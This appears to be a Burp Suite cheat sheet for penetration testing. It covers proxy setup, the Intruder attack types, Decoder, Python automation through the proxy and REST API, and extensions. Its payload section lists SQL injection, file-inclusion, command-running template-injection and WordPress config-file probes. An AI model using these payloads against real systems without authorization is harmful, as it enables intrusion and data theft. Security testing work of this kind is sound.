Burp Suite Cheat Sheet for Penetration Testing

A comprehensive guide for security professionals and WordPress developers

1. Keyboard Shortcuts

Global Shortcuts

Shortcut        Action
Ctrl+Shift+D    Switch to Dashboard
Ctrl+Shift+T    Switch to Target
Ctrl+Shift+P    Switch to Proxy
Ctrl+Shift+I    Switch to Intruder
Ctrl+Shift+R    Switch to Repeater
Ctrl+Shift+O    Switch to Organizer
Ctrl+Shift+E    Switch to Extender
Ctrl+,          Open Burp Suite preferences

Proxy Shortcuts

Shortcut        Action
Ctrl+I          Toggle interception on/off
Ctrl+F          Forward intercepted request
Ctrl+D          Drop intercepted request
Ctrl+A          Select all
Ctrl+L          Go to URL in browser
Ctrl+R          Send to Repeater
Ctrl+T          Send to Intruder
Ctrl+S          Send to Scanner (Professional)

Repeater Shortcuts

Shortcut        Action
Ctrl+Space      Send request
Ctrl+Enter      Send request
Ctrl+/          Go to previous request
Ctrl+.          Go to next request
Ctrl+U          URL encode selection

2. Proxy Usage

Basic Configuration

  1. Configure proxy listener:
    • Proxy > Proxy Settings > Add
    • Binding: 127.0.0.1:8080 (default)
    • Enable “Running” checkbox
  2. Configure browser proxy settings:
    • HTTP proxy: 127.0.0.1
    • Port: 8080
    • Or install “FoxyProxy” extension
  3. Install Burp CA certificate in browser:
    • Navigate to http://burp
    • Download CA certificate
    • Import into browser’s trusted certificates

Intercepting Requests

  1. Enable interception: Proxy > Intercept > “Intercept is on”
  2. Actions with intercepted requests:
    • Modify headers, parameters, or body content
    • Forward: Send request to server
    • Drop: Discard request
    • Action > Send to other Burp tools

Request History

  • View all requests in Proxy > HTTP History
  • Filter requests by domain, file type, status code, etc.
  • Right-click to send to other Burp tools

Match and Replace

  • Proxy > Options > Match and Replace
  • Automatically modify requests/responses based on regex patterns

3. Intruder Attack Types

Sniper

  • Tests each position individually with payloads
  • Positions: 3, Payloads: 10 = 30 requests
  • Best for: Testing single vulnerabilities across multiple positions

POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§password§

Battering Ram

  • Uses same payload in all defined positions simultaneously
  • Positions: 3, Payloads: 10 = 10 requests
  • Best for: Testing when the same input is needed in multiple fields

POST /login HTTP/1.1
Host: example.com

username=§admin§&password=§admin§

Pitchfork

  • Uses different payload sets for different positions
  • Each position gets its corresponding payload
  • Positions: 3, Payloads per set: 10 = 10 requests
  • Best for: Testing with related data (username+password pairs)

POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§

Cluster Bomb

  • Tests all combinations of payloads
  • Positions: 3, Payloads per set: 10 = 1,000 requests
  • Best for: Brute force attacks (username + password combinations)

POST /login HTTP/1.1
Host: example.com

username=§username§&password=§password§
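To make the request counts above concrete, here is an added Python example (not code from the original cheat sheet or from PortSwigger) that generates the requests each of the four attack types would send from a § marked template. It assumes Burp's convention of wrapping each position's base value in § markers, generalizes to any number of positions and payload sets, and uses small constructed payload lists so the page's 3 positions / 10 payloads figures can be checked directly; the volumes it produces are also what a rate limiter or a login-failure detection rule on the receiving side would observe.

```python
"""Request generation for Burp Intruder's four attack types (added example)."""
import itertools
from typing import Dict, Iterable, Iterator, List, Sequence

MARK = "§"  # Burp marks each payload position by wrapping its base value in § ... §


def positions(template: str) -> List[str]:
    """Return the base value of every marked position, in order."""
    parts = template.split(MARK)
    if len(parts) % 2 == 0:
        raise ValueError("unbalanced § markers in template")
    return parts[1::2]


def fill(template: str, values: Sequence[str]) -> str:
    """Substitute one value per marked position and drop the markers."""
    parts = template.split(MARK)
    if len(values) != len(parts) // 2:
        raise ValueError("need exactly one value per position")
    out = []
    for i, text in enumerate(parts[::2]):
        out.append(text)
        if i < len(values):
            out.append(values[i])
    return "".join(out)


def sniper(template: str, payloads: Iterable[str]) -> Iterator[str]:
    """One position at a time; the others keep their base value.
    positions x payloads requests."""
    base = positions(template)
    payloads = list(payloads)
    for i in range(len(base)):
        for p in payloads:
            values = list(base)
            values[i] = p
            yield fill(template, values)


def battering_ram(template: str, payloads: Iterable[str]) -> Iterator[str]:
    """The same payload in every position at once. len(payloads) requests."""
    n = len(positions(template))
    for p in payloads:
        yield fill(template, [p] * n)


def pitchfork(template: str, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """Position i takes payload set i; the sets advance in lock-step,
    so the run stops at the shortest set. min(len(set)) requests."""
    if len(payload_sets) != len(positions(template)):
        raise ValueError("pitchfork needs one payload set per position")
    for combo in zip(*payload_sets):
        yield fill(template, combo)


def cluster_bomb(template: str, payload_sets: Sequence[Sequence[str]]) -> Iterator[str]:
    """Every combination across the sets (Cartesian product).
    product(len(set)) requests."""
    if len(payload_sets) != len(positions(template)):
        raise ValueError("cluster bomb needs one payload set per position")
    for combo in itertools.product(*payload_sets):
        yield fill(template, combo)


def request_counts(n_positions: int, n_payloads: int) -> Dict[str, int]:
    """Request volume per attack type when every set has n_payloads entries."""
    return {
        "sniper": n_positions * n_payloads,
        "battering_ram": n_payloads,
        "pitchfork": n_payloads,
        "cluster_bomb": n_payloads ** n_positions,
    }


if __name__ == "__main__":
    # Constructed demo: the page's login body with two small payload lists
    body = "username=§admin§&password=§password§"
    users = ["alice", "bob"]
    words = ["p1", "p2"]
    print("sniper:", list(sniper(body, users)))
    print("battering ram:", list(battering_ram(body, users)))
    print("pitchfork:", list(pitchfork(body, [users, words])))
    print("cluster bomb:", list(cluster_bomb(body, [users, words])))
    print("3 positions x 10 payloads:", request_counts(3, 10))
```

Sniper leaves the untouched positions at their base value, which is why a two-position template with two payloads yields four requests, whereas pitchfork pairs the sets line by line and cluster bomb multiplies them out.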

4. Common Payloads for Attacks

SQL Injection Payloads

' OR 1=1 --
' OR '1'='1
' UNION SELECT 1,2,3 --
' UNION SELECT table_name,2,3 FROM information_schema.tables --
' UNION SELECT column_name,2,3 FROM information_schema.columns WHERE table_name='users' --
' AND (SELECT 5151 FROM (SELECT(SLEEP(5)))tImc) --
' AND extractvalue(rand(),concat(0x7e,(SELECT version()),0x7e)) --

LFI Payloads

../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
/proc/self/environ
/var/log/apache2/access.log
php://filter/convert.base64-encode/resource=/etc/passwd

SSTI (Server-Side Template Injection) Payloads

${7*7}
{{7*7}}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
${T(java.lang.Runtime).getRuntime().exec('whoami')}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

WordPress-Specific Payloads

/wp-login.php
/wp-admin
/wp-content/uploads/
/wp-content/plugins/
/wp-config.php.bak
/wp-config.php~
/?author=1

Fuzzing Payloads

# Path discovery
/admin
/backup
/config
/dev
/.git/HEAD

# File extensions
.bak
.old
.swp
.txt
.zip
.tar.gz

# WordPress files
wp-config.php
wp-content/debug.log
wp-content/uploads/

5. Repeater & Decoder Usage

Repeater

  • Send intercepted requests to Repeater: Right-click > Send to Repeater
  • Modify request and click “Send” to resend
  • View side-by-side request and response
  • Use multiple tabs for comparing responses
  • Right-click > Change request method (GET/POST)

Decoder

  1. Select text and right-click > Send to Decoder (or Ctrl+Shift+D)
  2. Encoding options:
    • URL: Convert special characters to %XX format
    • HTML: Convert characters to HTML entities
    • Base64: Encode/decode as Base64
    • ASCII Hex: Convert to/from hexadecimal
    • Hex: Raw binary data as hexadecimal
    • Gzip: Compress/decompress using gzip
    • Deflate: Compress/decompress using deflate
  3. Chained encoding/decoding:
    • “Encode as…” applies the encoding
    • “Decode as…” attempts to decode
    • Multiple encodings can be applied sequentially
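The chained encoding described in step 3 is easy to get wrong by hand (the layers must be peeled in the reverse order they were applied), so here is an added Python example, not code from the original page or from Burp, that reproduces Decoder's URL, HTML, Base64, ASCII hex, gzip and deflate transforms as byte-to-byte functions and chains them. It assumes the standard library only; the `deflate` transform uses the zlib-wrapped stream, and the sample input is constructed.

```python
"""Chained encode/decode transforms in the spirit of Burp Decoder (added example)."""
import base64
import binascii
import gzip
import html
import urllib.parse
import zlib
from typing import Callable, Dict, Sequence


def _to_text(b: bytes) -> str:
    # surrogateescape keeps arbitrary bytes round-trippable through str
    return b.decode("utf-8", "surrogateescape")


def _to_bytes(s: str) -> bytes:
    return s.encode("utf-8", "surrogateescape")


# Every transform works on bytes, as Decoder does, so binary layers (gzip, deflate)
# chain cleanly with text layers (URL, HTML, Base64, hex).
ENCODERS: Dict[str, Callable[[bytes], bytes]] = {
    "url": lambda b: urllib.parse.quote_from_bytes(b, safe="").encode("ascii"),
    "html": lambda b: _to_bytes(html.escape(_to_text(b), quote=True)),
    "base64": base64.b64encode,
    "ascii_hex": binascii.hexlify,
    "gzip": gzip.compress,
    "deflate": zlib.compress,  # zlib-wrapped deflate stream
}

DECODERS: Dict[str, Callable[[bytes], bytes]] = {
    "url": urllib.parse.unquote_to_bytes,
    "html": lambda b: _to_bytes(html.unescape(_to_text(b))),
    "base64": lambda b: base64.b64decode(b, validate=True),  # reject stray characters
    "ascii_hex": binascii.unhexlify,
    "gzip": gzip.decompress,
    "deflate": zlib.decompress,
}


def encode_chain(data: bytes, schemes: Sequence[str]) -> bytes:
    """Apply each "Encode as..." step in the order given."""
    for scheme in schemes:
        data = ENCODERS[scheme](data)
    return data


def decode_chain(data: bytes, schemes: Sequence[str]) -> bytes:
    """Undo a chain built by encode_chain: peel the layers in reverse order."""
    for scheme in reversed(schemes):
        data = DECODERS[scheme](data)
    return data


if __name__ == "__main__":
    # Constructed sample: a form body that is Base64-encoded and then URL-encoded
    sample = b"a=1&b=<x>"
    chain = ["base64", "url"]
    wire = encode_chain(sample, chain)
    print("encoded:", wire.decode())
    print("decoded:", decode_chain(wire, chain))
    packed = encode_chain(b'{"role":"admin"}', ["gzip", "base64"])
    print("gzip+base64:", packed.decode())
```

The two chain functions take the same scheme list; `decode_chain` walks it backwards, which is exactly the order a tester has to follow in Decoder when a value arrives Base64-encoded inside a URL-encoded parameter.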

6. Automating with Burp Suite API

Python Script for Sending Requests Through Burp Proxy

import requests
import urllib3

# Burp Proxy listener (Proxy > Proxy settings; 127.0.0.1:8080 by default).
# Both schemes point at the same listener: Burp terminates the TLS connection itself.
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

# Custom headers
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}

# Certificate verification: requests does not trust Burp's CA, so the usual shortcut
# is verify=False. The cleaner option is to export the CA from http://burp, convert the
# DER file to PEM and point at it, which keeps verification on:
#   VERIFY = "/path/to/burp-ca.pem"
VERIFY = False
if VERIFY is False:
    # Silence the InsecureRequestWarning that verify=False would otherwise print per request
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# A held (intercepted) request would otherwise block the script indefinitely
TIMEOUT = 30  # seconds

# GET request through Burp
def send_get(url, params=None):
    return requests.get(
        url,
        params=params,
        proxies=proxies,
        headers=headers,
        verify=VERIFY,
        timeout=TIMEOUT
    )

# POST request through Burp
def send_post(url, data):
    return requests.post(
        url,
        data=data,
        proxies=proxies,
        headers=headers,
        verify=VERIFY,
        timeout=TIMEOUT
    )

# Example usage
if __name__ == "__main__":
    target = "https://example.com/login"
    login_data = {
        "username": "admin",
        "password": "password123"
    }

    response = send_post(target, login_data)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")

Using Burp REST API (Professional)

import json
import time

import requests

# Burp Professional REST API settings (Settings > Suite > REST API). The service
# listens on http://127.0.0.1:1337 by default and authenticates by an API key placed
# in the URL path (http://127.0.0.1:1337/<api_key>/v0.1/), not in an Authorization header.
api_base = "http://127.0.0.1:1337"
api_key = "your_api_key_here"
api_url = f"{api_base}/{api_key}/v0.1/scan"

headers = {"Content-Type": "application/json"}

# Create a new scan task. The API answers 201 Created with an empty body; the id of the
# new task is returned in the Location header.
def create_scan(target_url):
    payload = {
        "scan_configurations": [
            # Must name a configuration from Burp's library; "Crawl and Audit - Fast" is built in.
            # Omit the key entirely to scan with Burp's default configuration.
            {"type": "NamedConfiguration", "name": "Crawl and Audit - Fast"}
        ],
        "urls": [target_url]
    }

    response = requests.post(
        api_url,
        headers=headers,
        data=json.dumps(payload),
        timeout=30
    )
    response.raise_for_status()

    return response.headers["Location"]

# Get scan status: the JSON includes scan_status, scan_metrics and issue_events
def get_scan_status(task_id):
    response = requests.get(
        f"{api_url}/{task_id}",
        headers=headers,
        timeout=30
    )
    response.raise_for_status()

    return response.json()

# Example usage: start a scan and poll until it has finished
if __name__ == "__main__":
    task_id = create_scan("https://example.com")
    print(f"Created scan task with ID: {task_id}")

    while True:
        status = get_scan_status(task_id)
        print(f"Scan status: {status['scan_status']}")
        if status["scan_status"] in ("succeeded", "failed"):
            break
        time.sleep(10)

7. Popular Burp Extensions

Essential Extensions

Extension Name      Description
Logger++            Advanced logging of requests and responses
Autorize            Authorization enforcement testing
Turbo Intruder      Fast intruder with custom attack scripting
Active Scan++       Extends active scanning capabilities
CSRF Scanner        Detects Cross-Site Request Forgery vulnerabilities
JWT Editor          Testing and manipulating JSON Web Tokens
JSON Beautifier     Pretty-prints and validates JSON content
Retire.js           Identifies vulnerable JavaScript libraries
Param Miner         Parameter mining for hidden attack surfaces
WordPress Scanner   Specific scanner for WordPress vulnerabilities

Installing Extensions

  1. Extender > BApp Store
  2. Browse or search for extensions
  3. Click “Install” button
  4. View loaded extensions under Extender > Extensions

WordPress-Specific Extensions

  • WP Plugin Scanner: Enumerates and tests WordPress plugins
  • WP Scanner Integration: Integrates WPScan results
  • CMS Scanner: Detects WordPress and plugin versions

8. Tips for Optimizing Burp Suite Performance

Memory Management

  • Increase Java heap size:
    • Burp > Project options > Misc > Java Environment
    • Maximum memory allocation: 2048 MB (adjust based on RAM)

Speed Optimization

  • Use target scope to limit requests:
    • Target > Scope > Include in scope
    • Project options > Scope > URL Scope
  • Enable “Use smart scan settings” in Scanner
  • Disable logging for file types:
    • Proxy > Options > Intercept Client Requests
    • Disable for: \.jpg$|\.gif$|\.png$|\.css$|\.js$

Efficient Workflows

  • Use Burp project files to save/restore state
  • Create and use saved scan configurations
  • Use match/replace rules for repetitive changes
  • Create macros for multi-step authentication

Resource Saving

  • Disable passive scanning if not needed
  • Configure response interception strategically
  • Set up strict scoping for large applications
  • Use Intruder’s “Number of threads” wisely (20-50 is often optimal)

WordPress-Specific Optimizations

  • Add WordPress admin paths to scope
  • Create scan profiles specific to WordPress vulnerabilities
  • Use match/replace rules to add WordPress authentication cookies automatically
